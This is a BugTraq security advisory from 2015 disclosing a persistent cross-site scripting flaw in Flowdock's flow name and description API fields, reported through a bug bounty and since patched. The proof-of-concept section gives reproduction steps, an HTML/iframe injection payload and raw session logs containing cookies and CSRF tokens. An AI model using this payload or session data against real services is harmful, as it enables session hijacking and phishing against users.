BugTraq
Flowdock API Bug Bounty #3 - (Invite) Persistent Web Vulnerability Sep 28 2015 08:18AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Flowdock API Bug Bounty #3 - (Invite) Persistent Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1574

Release Date:
=============
2015-09-24

Vulnerability Laboratory ID (VL-ID):
====================================
1574

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
Chat & inbox for teams.. One place to talk and stay up-to-date. Flowdock is a team collaboration app for desktop, mobile & web.
Work on things that matter, be transparent and solve problems across tools, teams & time zones. Try it for free for 30 days. Keeping Flowdock`s
environment and customer data safe and secure is a top priority for us. Find more details on our Help pages. Don`t hesitate to contact us
at support (at) flowdock (dot) com [email concealed] should you have any questions about Flowdock`s security.

(Copy of the Vendor Homepage: https://www.flowdock.com/security )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation web vulnerability in the official Flowdock online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-08-16: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2015-08-17: Vendor Notification (Flowdock Security Team - Bug Bounty Program)
2015-08-17: Vendor Response/Feedback (Flowdock Security Team - Bug Bounty Program)
2015-08-18: Vendor Fix/Patch (Flowdock Developer Team)
2015-09-24: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Rally Software
Product: Flowdock - Online Service (Web-Application) [API] 2015 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Flowdock online-service web-application.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable context function or service module.

The vulnerability is located in the flow name and flow description values of the Invite your Team (Flowdock Rest API) module POST method request.
Remote attackers with low privilege application user accounts are able to inject own malicious script codes to the application-side of the service.
The request method to inject malicious context is POST and the attack vector is located on the application-side of the flowdock api web-service.

Remote attackers are able to inject malicious script codes to the application-side to compromise flowdock rest api dashboard (messages) by session
manipulation or session evasion attacks. The attacker inject via name and description values malicious payloads which demonstrates the injection point
and the execution point is in the insecure validated message inbox of the main deashboard.

The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8.
Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources
and persistent manipulation of affected or connected service module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Invite your Team (Flowdock Rest API)

Vulnerable Parameter(s):
[+] Flow Name
[+] Flow Description

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Login to your account at the flowdock website
2. Surf to the main dasboard module
3. Click the invite your team button
4. Switch to the flow menu bar
5. Inject malicious script code test payload to the name and description of flowdock inputs via api
6. Save the input and return back to the module by refresh or cancel after update
7. The code executes in the message board but also in the message dasboard index were the user has been invited to grant access
8. Successful reproduce of the vulnerability in flowdock api and main dashbaord!

Note: Use tamper data in mozilla to manipulate the session values and to approve the existence of the vulnerability!

Execution Point:
https://www.flowdock.com/app/vulnerability-lab/main
https://www.flowdock.com/app/vulnerability-lab/main/messages/6

Inject Point via Invite:
https://www.flowdock.com/app/vulnerability-lab/main/settings/people
> https://www.flowdock.com/app/vulnerability-lab/main/settings/flow
> Flow description & Flow description

PoC:
../(Vulnerability Lab) - Flowdock.htm
../(Vulnerability Lab) - Flowdock_2.htm

--- PoC Session Logs [POST] ---

14:45:37.893[547ms][total 547ms] Status: 200[OK]
PATCH https://www.flowdock.com/rest/flows/vulnerability-lab/main Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Grö�e des Inhalts[1038] Mime Type[application/json]
Request Header:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/json; charset=UTF-8]
X-CSRF-Token[F1Gu5THaCu+boEBc4Vh03Hp6/gdtLDfJmhYp7CemM3lfc2s5qHBmhPztO9C
FR5xRsBs5HmBpFwMfpl7DfePR6Q==]
X-Requested-With[XMLHttpRequest]
Referer[https://www.flowdock.com]
Content-Length[27]
Cookie[_flowdock_session=dGRDOWNBUzY0ZUI5NDBuTHpUaG54TWc2V1FTWjBXeTRCL0x
2NU50VDUwNGszSEZSaUZqZUFBKzFsUWdZOVdVcEdjR1lvVnpwZmtYd080NE9OWUtLMnNqaG9
qTFFSaUVsa0g2NnlGaUhvMWtvRlhWZmFuTlduMk8rM05jOERoOURPcGx5YnlXZ0w4blg1NlR
Md0d4b2poMmwyMXl4czdFMGhnNEFuWTlWbTd1bEFzUEZaT2luTXJ1c1NlZDhpZnNZVGxvR1V
hOGd0Y2MwTVA1dUVJUUVKTjRST09OcmNsVURsVE9pMGJUMER0RkE1MG9zbk9PMmVIK1FFbjM
3YVdUNy0taytKRWs0Ti9zaUJhQWdZM0ZzY0hvZz09--cbdbb966304bbcb2c80d374170b33
c62ead6d858; _ga=GA1.2.316225615.1439815246; _gat=1; ga_cid=316225615.1439815246; __ar_v4=NVE6VSAVAFEITPQZLCROVA%3A20150816%3A6%7CN4SGXQCDSJGPZCWP5DGWWO%3
A20150816%3A6%7CP3GQR6LVEJFUDLS6YOOZNQ%3A20150816%3A6; login=1; referrer=Imh0dHBzOi8vd3d3LmZsb3dkb2NrLmNvbS9zaWdudXAi--3cec34efe6cf016e9
8a271766e3987690fac2632; logged_in=1439815538]
Connection[keep-alive]
POST-Daten:
{"team_notifications":true}[]
Response Header:
Date[Mon, 17 Aug 2015 12:45:40 GMT]
status[200 OK]
Strict-Transport-Security[max-age=31557600]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Flowdock-User[171908]
Content-Type[application/json; charset=utf-8]
Cache-Control[private, no-store, no-cache]
X-Request-ID[eec0bb24-f305-4d73-8080-36d59e4f0050]
X-Runtime[0.231912]
Set-Cookie[_flowdock_session=WHpYdmJhNm1rT1RmNTZBeWVlZkpVMlBNRGJ0dmppamJ
PSmZrZXZsNlVIZU9sY1A1d29saEU4V21oZWVEcktHczN1bm9DYlA0Tis4RnkyckI2MDRoRU5
oQitYRXBwMDY2bEFsMzY4a3A5SkkrbFhIU0xWRmxIM3V1K2dVNzRBK1R6L0U4TGFzOGkvZW9
LMU1mUk50bGQvUDBwMUtKNUkxM1NVRnFRMGU3WkczL3pTS2lGMEtpbDJkTSthT29tRXFTSDB
ud3g4N2hRZzd1WkVQS1d0RzJBbUZMZ1AzR2tUY05BSk5IY2hkM1BKRVNBdFNNTUdXU29BVDF
rUnM0T2Jkcy0tZnhlNU1VM2E5dnNBMWt0ZXBWbW0vUT09--20617205a5d5c1fce6b92852e
d2b654dd79e4f5f; domain=.flowdock.com; path=/; secure; HttpOnly]
X-Server-Id[475b6e71889f174f61273dab9d11d64422779f4c]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1038]

14:45:41.389[279ms][total 279ms] Status: 200[OK]
GET https://www.flowdock.com/rest/organizations Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Grö�e des Inhalts[462] Mime Type[application/json]
Request Header:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-CSRF-Token[F1Gu5THaCu+boEBc4Vh03Hp6/gdtLDfJmhYp7CemM3lfc2s5qHBmhPztO9C
FR5xRsBs5HmBpFwMfpl7DfePR6Q==]
X-Requested-With[XMLHttpRequest]
Referer[https://www.flowdock.com]
Cookie[_flowdock_session=eFk1WlAzZ1NlbmtFbW9kNzdFUEowZFlCRUJtR0FVRTMvaGp
WaklmeElXYXIxc0hWemNGRGxwRTY3c0RMZ2xyRDlsWHNzaDFSTmFjajg1TjFWUnFsTnlZQ2F
QQUZMMHd6TXVwRjg3M1RRRUg4MnVlNjdhQ1FHbjI1eHFmb2Exd3ZUVmw5Z2t2cURodDBKeTJ
TQXYyemdqaVNmeHdjMWZpOGZRVS9LZHV0V0x2WWgyR3NVZzUxNnZLbHJxNWdaOFVMRVRrUHN
kM3d0NkJ0VWZuWlNSUFJwM1N0emFjc3k1ZjVGOENSYzk1U1B1KzlWV0tieWlyNStWVnl1Zml
XeGFhYy0tRjZ3VzZmendieitZNzFTOFd0RUJjUT09--87cdea353b5110514da2f5f0aa971
ef9b2a27f02; _ga=GA1.2.316225615.1439815246; _gat=1; ga_cid=316225615.1439815246; __ar_v4=NVE6VSAVAFEITPQZLCROVA%3A20150816%3A6%7CN4SGXQCDSJGPZCWP5DGWWO%3
A20150816%3A6%7CP3GQR6LVEJFUDLS6YOOZNQ%3A20150816%3A6; login=1; referrer=Imh0dHBzOi8vd3d3LmZsb3dkb2NrLmNvbS9zaWdudXAi--3cec34efe6cf016e9
8a271766e3987690fac2632; logged_in=1439815538]
Connection[keep-alive]
Response Header:
Date[Mon, 17 Aug 2015 12:45:43 GMT]
status[200 OK]
Strict-Transport-Security[max-age=31557600]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Flowdock-User[171908]
Content-Type[application/json; charset=utf-8]
Cache-Control[private, no-store, no-cache]
X-Request-ID[5b95710b-b69a-4cb6-965f-6dedaae5dd91]
X-Runtime[0.073496]
Set-Cookie[_flowdock_session=ZEp0MWVJektoN2FOY3pvelduOFRqUEp6ajJXdU55VTF
KcHlaWDNTYU9wN05XYjBNUXhqZCtQZzZHVzRUcUw5SkY3alhHSFVpMmVrWE5IK1ZyUkhVZGR
XT0xoZDJNYmtNQnMySjZTRi9oZzNZWDJOMzVlQnU2OFZEdllBdTJEcHVHaWFBTkNuL0NRK3F
MSDlGL2E3RXU0dTdGa3ZRa3p0S0dLdVM3Ykl1bml2TmptUGhwVzJ3L05YTUI3NTZ1VlNYM2Q
1UUYvQW9KbTVNc3o0ZG93elZxbXFUdjRRbDVQUFlhaGtBTDRjQWxRS1RnUk5LUTkyNnovUEh
vbGUyRVljMS0tdkxDdjhrRnRMa3dreHpyOFVPSE12QT09--fccec74f5dea50c4179807e56
0d1e396d41c2396; domain=.flowdock.com; path=/; secure; HttpOnly]
X-Server-Id[45c836f72727be03bd8c2ae92cedbf6a75a556bc]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[462]

14:45:41.671[269ms][total 269ms] Status: 200[OK]
GET https://www.flowdock.com/rest/flows/vulnerability-lab/main/legacy_source
s Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Grö�e des Inhalts[424] Mime Type[application/json]
Request Header:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-CSRF-Token[F1Gu5THaCu+boEBc4Vh03Hp6/gdtLDfJmhYp7CemM3lfc2s5qHBmhPztO9C
FR5xRsBs5HmBpFwMfpl7DfePR6Q==]
X-Requested-With[XMLHttpRequest]
Referer[https://www.flowdock.com]
Cookie[_flowdock_session=ZEp0MWVJektoN2FOY3pvelduOFRqUEp6ajJXdU55VTFKcHl
aWDNTYU9wN05XYjBNUXhqZCtQZzZHVzRUcUw5SkY3alhHSFVpMmVrWE5IK1ZyUkhVZGRXT0x
oZDJNYmtNQnMySjZTRi9oZzNZWDJOMzVlQnU2OFZEdllBdTJEcHVHaWFBTkNuL0NRK3FMSDl
GL2E3RXU0dTdGa3ZRa3p0S0dLdVM3Ykl1bml2TmptUGhwVzJ3L05YTUI3NTZ1VlNYM2Q1UUY
vQW9KbTVNc3o0ZG93elZxbXFUdjRRbDVQUFlhaGtBTDRjQWxRS1RnUk5LUTkyNnovUEhvbGU
yRVljMS0tdkxDdjhrRnRMa3dreHpyOFVPSE12QT09--fccec74f5dea50c4179807e560d1e
396d41c2396; _ga=GA1.2.316225615.1439815246; _gat=1; ga_cid=316225615.1439815246; __ar_v4=NVE6VSAVAFEITPQZLCROVA%3A20150816%3A6%7CN4SGXQCDSJGPZCWP5DGWWO%3
A20150816%3A6%7CP3GQR6LVEJFUDLS6YOOZNQ%3A20150816%3A6; login=1; referrer=Imh0dHBzOi8vd3d3LmZsb3dkb2NrLmNvbS9zaWdudXAi--3cec34efe6cf016e9
8a271766e3987690fac2632; logged_in=1439815538]
Connection[keep-alive]
Response Header:
Date[Mon, 17 Aug 2015 12:45:43 GMT]
status[200 OK]
Strict-Transport-Security[max-age=31557600]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Flowdock-User[171908]
Content-Type[application/json; charset=utf-8]
Cache-Control[private, no-store, no-cache]
X-Request-ID[63eb2e65-2171-4a74-99e0-1b4585d5911d]
X-Runtime[0.061483]
Set-Cookie[_flowdock_session=QzN3WHZtc1lzdDVtNGpLTGYzNk9vdFZxbnR6cGV1Rzl
5WXVFTUo1NnlYSVM5WVNQZU8xOXVxRDdSTEErR2J0R3FSWU94U2xLZmFibWhzWjdEVFNTSGR
qWCtDbmFCbnNuWW9WcXJhaldvREx5K0I4WGd3VFhxRHNXSEgxWitNcGNFV1F5LzBNaTd4TDY
0QXVnUmdUM094NmlpdlRNQy85L0xJcnN1akFRQVZyRjN2MnFzU09lUldoZE1sUElmLzFoSjV
kZGh2dFBYaXhnQ210K2JCVE90YWs1NTJiM05Wem5zZnJyZzhxYk4zVG1qdUFId1VBOVlJZ1p
CYWpGV29vTy0tUXBvSGc3cm1NVXdXcFVNeUtJV1c0Zz09--fe722bc41c75c489788151b2d
f42becbf7e127f2; domain=.flowdock.com; path=/; secure; HttpOnly]
X-Server-Id[d4741d0780602ce7b33aca93992eb68edf43247c]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[424]

14:45:49.468[349ms][total 349ms] Status: 200[OK]
PATCH https://www.flowdock.com/rest/flows/vulnerability-lab/main Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Grö�e des Inhalts[1043] Mime Type[application/json]
Request Header:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/json; charset=UTF-8]
X-CSRF-Token[F1Gu5THaCu+boEBc4Vh03Hp6/gdtLDfJmhYp7CemM3lfc2s5qHBmhPztO9C
FR5xRsBs5HmBpFwMfpl7DfePR6Q==]
X-Requested-With[XMLHttpRequest]
Referer[https://www.flowdock.com]
Content-Length[196]
Cookie[_flowdock_session=UklHQ24yeS9SOHhuV3VaVVM2Z1hIdTVIWm9NOFMxY2lReUk
xdDBVVmJDQzRUaU43dHRURWI1djhKeEF2NC93YndlWDg0M0t2K0ZjUUhGYmVvMUN3eG13bk9
1Uk8wMG9EMUhBYWpDTDR0YVA2ZFNCQkVzSzNXRmUvQzBMR3hRT0JDTkVWYXI0MlJJWnVvSzR
XMmRzN0drTzNNUjZjWlZ1RnpVZ2NHTkltZzBFSUF0QWlqRGlVQWY2VHlmZHJzSjdENmwzZlQ
3M0pzNzdJSXhkbXNkVE5BdSt5RG1RVEFrcnVKTGQrUFFpbm1tQS9EMW1oRG9zbzIvZ2x2aTl
HWjN4dS0tRSsyTjAzeDhBWnNwWm9wRXk0TjFHZz09--a11946082028d7dff6b0052618400
ad6b6d15c4a; _ga=GA1.2.316225615.1439815246; _gat=1; ga_cid=316225615.1439815246; __ar_v4=NVE6VSAVAFEITPQZLCROVA%3A20150816%3A6%7CN4SGXQCDSJGPZCWP5DGWWO%3
A20150816%3A6%7CP3GQR6LVEJFUDLS6YOOZNQ%3A20150816%3A6; login=1; referrer=Imh0dHBzOi8vd3d3LmZsb3dkb2NrLmNvbS9zaWdudXAi--3cec34efe6cf016e9
8a271766e3987690fac2632; logged_in=1439815538]
Connection[keep-alive]
POST-Daten:
{"name":"Main \"><\"<img src[\"x\">%20%20>\"<iframe src=a>%20<iframe>","description":"The Main flow is for organization-wide discussions. \"><\"<img src=\"x\">%20%20>\"<iframe src=a>%20<iframe>"}]
Response Header:
Date[Mon, 17 Aug 2015 12:45:51 GMT]
status[200 OK]
Strict-Transport-Security[max-age=31557600]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Flowdock-User[171908]
Content-Type[application/json; charset=utf-8]
Cache-Control[private, no-store, no-cache]
X-Request-ID[55928ba7-369b-4ba2-bb12-4159e28dff79]
X-Runtime[0.143648]
Set-Cookie[_flowdock_session=cVlGQ0pPWERETkZIRDNOckczWmU1MUppRFpVZXNRZlZ
JbGU4allGV3ZaRm5LVHhHSHU3T0F2VnQvTXdOdVBsMjA3ZmxZUUxUaFcyYzZBalg2TVdLMkl
tb2VuWjJQeEJkbzdGOWZLTVlKQ2JqQjdoYndmZFdsOUpNaE1PcFJTZm9rbFdKRThSMkZ2cWN
YNFp3UmJYNlhnVXgxdnYrN0t1VE5jNlI3eVlGdXN1MkM3dUhEcm13UE1VRHBvZ080NEhaYnR
ITTdCNmQ4Q3hQMkpmVlJWNnI4Z0NKRGVRZkpqSXBCNWlueWt3elo2ZXEvVGFNSVNtTUtxL3F
ZYmpYc09sbi0tYmFaZkV4cFdJRlFSbkp3WTlJZHgxZz09--75a2900ce0289b3de0771d98b
30da7155358f2a2; domain=.flowdock.com; path=/; secure; HttpOnly]
X-Server-Id[475b6e71889f174f61273dab9d11d64422779f4c]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1043]

14:45:49.866[243ms][total 243ms] Status: 200[OK]
GET https://www.flowdock.com/app/vulnerability-lab/main/settings/x Load Flags[LOAD_NORMAL] Grö�e des Inhalts[755] Mime Type[text/html]
Request Header:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.flowdock.com]
Cookie[_flowdock_session=cVlGQ0pPWERETkZIRDNOckczWmU1MUppRFpVZXNRZlZJbGU
4allGV3ZaRm5LVHhHSHU3T0F2VnQvTXdOdVBsMjA3ZmxZUUxUaFcyYzZBalg2TVdLMkltb2V
uWjJQeEJkbzdGOWZLTVlKQ2JqQjdoYndmZFdsOUpNaE1PcFJTZm9rbFdKRThSMkZ2cWNYNFp
3UmJYNlhnVXgxdnYrN0t1VE5jNlI3eVlGdXN1MkM3dUhEcm13UE1VRHBvZ080NEhaYnRITTd
CNmQ4Q3hQMkpmVlJWNnI4Z0NKRGVRZkpqSXBCNWlueWt3elo2ZXEvVGFNSVNtTUtxL3FZYmp
Yc09sbi0tYmFaZkV4cFdJRlFSbkp3WTlJZHgxZz09--75a2900ce0289b3de0771d98b30da
7155358f2a2; _ga=GA1.2.316225615.1439815246; _gat=1; ga_cid=316225615.1439815246; __ar_v4=NVE6VSAVAFEITPQZLCROVA%3A20150816%3A6%7CN4SGXQCDSJGPZCWP5DGWWO%3
A20150816%3A6%7CP3GQR6LVEJFUDLS6YOOZNQ%3A20150816%3A6; login=1; referrer=Imh0dHBzOi8vd3d3LmZsb3dkb2NrLmNvbS9zaWdudXAi--3cec34efe6cf016e9
8a271766e3987690fac2632; logged_in=1439815538]
Connection[keep-alive]
Response Header:
Date[Mon, 17 Aug 2015 12:45:51 GMT]
status[200 OK]
Strict-Transport-Security[max-age=31557600]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
content-security-policy[default-src *;script-src https://d2cxspbh1aoie1.cloudfront.net https://www.google-analytics.com https://gdata.youtube.com https://api.twitter.com;style-src https://d2cxspbh1aoie1.cloudfront.net 'unsafe-inline' 'unsafe-eval';object-src https://d2cxspbh1aoie1.cloudfront.net;frame-src 'self' flowdock:;child-src 'self' flowdock:;referrer origin]
Content-Type[text/html; charset=utf-8]
Cache-Control[private, no-store, no-cache]
X-Request-ID[b88f5455-09d4-4886-9cf5-d35595b9a0fb]
X-Runtime[0.030890]
Set-Cookie[_flowdock_session=VnQzQ1RBbkVDMmQ3ZmVXZklGNW9sTHFsbWp3c0xlQjF
3YlRFeUQwTWlFWXFxeDRvQU5PaDBNdDdvdzBZZmNwRkFpYmRJcE4xUTEydEtMZ3ErTHdYMkE
wZXphT1NjQ1F4MmVrRlV1ZE9NY2NGdXFIRW81L2ZBb01DZlZJMExmWkdCUnNocHIxeWNJLzQ
4bVFwbmhJOUVaMGFmVXNlQWJhT2R5czRIWE0xVGZmVzMyeWQ4RkdUcVVuWXByV29Lckt4RUl
6Ykk1bDhSaFNXZjV0RXBoaFFwWVlkK2RhT3E2UVlQUTc3VFJMZ0tCTURqQ1Q5c3NaVDZKT0J
xS21Wakp2Ti0tcmhuOFZqbEtua09xNzNsMWtDZy85UT09--063bdbee4c665a6e03a170925
d30d12df58df57f; domain=.flowdock.com; path=/; secure; HttpOnly]
X-Server-Id[3c4883af38147558374983c6d90b2bb9badb86d4]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[755]

14:45:49.880[260ms][total 260ms] Status: 200[OK]
GET https://www.flowdock.com/app/vulnerability-lab/main/settings/a Load Flags[LOAD_DOCUMENT_URI ] Grö�e des Inhalts[756] Mime Type[text/html]
Request Header:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.flowdock.com]
Cookie[_flowdock_session=cVlGQ0pPWERETkZIRDNOckczWmU1MUppRFpVZXNRZlZJbGU
4allGV3ZaRm5LVHhHSHU3T0F2VnQvTXdOdVBsMjA3ZmxZUUxUaFcyYzZBalg2TVdLMkltb2V
uWjJQeEJkbzdGOWZLTVlKQ2JqQjdoYndmZFdsOUpNaE1PcFJTZm9rbFdKRThSMkZ2cWNYNFp
3UmJYNlhnVXgxdnYrN0t1VE5jNlI3eVlGdXN1MkM3dUhEcm13UE1VRHBvZ080NEhaYnRITTd
CNmQ4Q3hQMkpmVlJWNnI4Z0NKRGVRZkpqSXBCNWlueWt3elo2ZXEvVGFNSVNtTUtxL3FZYmp
Yc09sbi0tYmFaZkV4cFdJRlFSbkp3WTlJZHgxZz09--75a2900ce0289b3de0771d98b30da
7155358f2a2; _ga=GA1.2.316225615.1439815246; _gat=1; ga_cid=316225615.1439815246; __ar_v4=NVE6VSAVAFEITPQZLCROVA%3A20150816%3A6%7CN4SGXQCDSJGPZCWP5DGWWO%3
A20150816%3A6%7CP3GQR6LVEJFUDLS6YOOZNQ%3A20150816%3A6; login=1; referrer=Imh0dHBzOi8vd3d3LmZsb3dkb2NrLmNvbS9zaWdudXAi--3cec34efe6cf016e9
8a271766e3987690fac2632; logged_in=1439815538]
Connection[keep-alive]
Response Header:
Date[Mon, 17 Aug 2015 12:45:51 GMT]
status[200 OK]
Strict-Transport-Security[max-age=31557600]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
content-security-policy[default-src *;script-src https://d2cxspbh1aoie1.cloudfront.net https://www.google-analytics.com https://gdata.youtube.com https://api.twitter.com;style-src https://d2cxspbh1aoie1.cloudfront.net 'unsafe-inline' 'unsafe-eval';object-src https://d2cxspbh1aoie1.cloudfront.net;frame-src 'self' flowdock:;child-src 'self' flowdock:;referrer origin]
Content-Type[text/html; charset=utf-8]
Cache-Control[private, no-store, no-cache]
X-Request-ID[f5b2b500-c39e-40a9-b972-bada11a1b69c]
X-Runtime[0.038200]
Set-Cookie[_flowdock_session=M09RT1dSU3ZoQk9lcmlUREhROXZ3RmJwdlVnRnJOTkJ
uU1FSanFna09hTldEaENtYlhMWU9XVVl6Q3dhNFFVcXBKaGs3OG8rbTQ2VnBXSXRtbU5UM3h
aNmJWQWJacTBEV0ZqTTA5REdjYWIzMGpqT2xndUt5VzU4bmR2ejhWSjdxMk45Y2t6cWRyTVN
DekxmRzVyQVU4WmorM0ovdi9GSVJwaE1PRHVQSlRRNTdGM0twUnUrbzZRYmx3cHhqa3ptRTN
IRHIxM2NtRTNRN3hGaUtRRElxU1plczQ5K1hpYkVxbGM5UHRXVHpYbUNDc2RuWUJHbFY3a1h
TU0p2VysxRy0tQllaZnY4eDdaVmhOaHZueTV3NzMvQT09--a5e6cfd8baf54325068065a49
e96c3f11390cfeb; domain=.flowdock.com; path=/; secure; HttpOnly]
X-Server-Id[e81492850cf92179be997e3e76ee764adc2cd00a]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[756]

Reference(s):
https://www.flowdock.com/
https://www.flowdock.com/rest/organizations
https://www.flowdock.com/rest/flows/vulnerability-lab/main
https://www.flowdock.com/app/vulnerability-lab/main/settings/

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable flow name or description name input fields.
Restrict the input and the parameter request to prevent persistent script code injection to the main dashboard module.
Filter the context of the output value in the message, treat link and chat inbox module to finally resolve the zero-day vulnerability.

Security Risk:
==============
The security risk of the application-side vulnerability in the flowdock online service web-application is estimated as medium. (CVSS 3.8)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [bkm (at) evolution-sec (dot) com [email concealed]]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus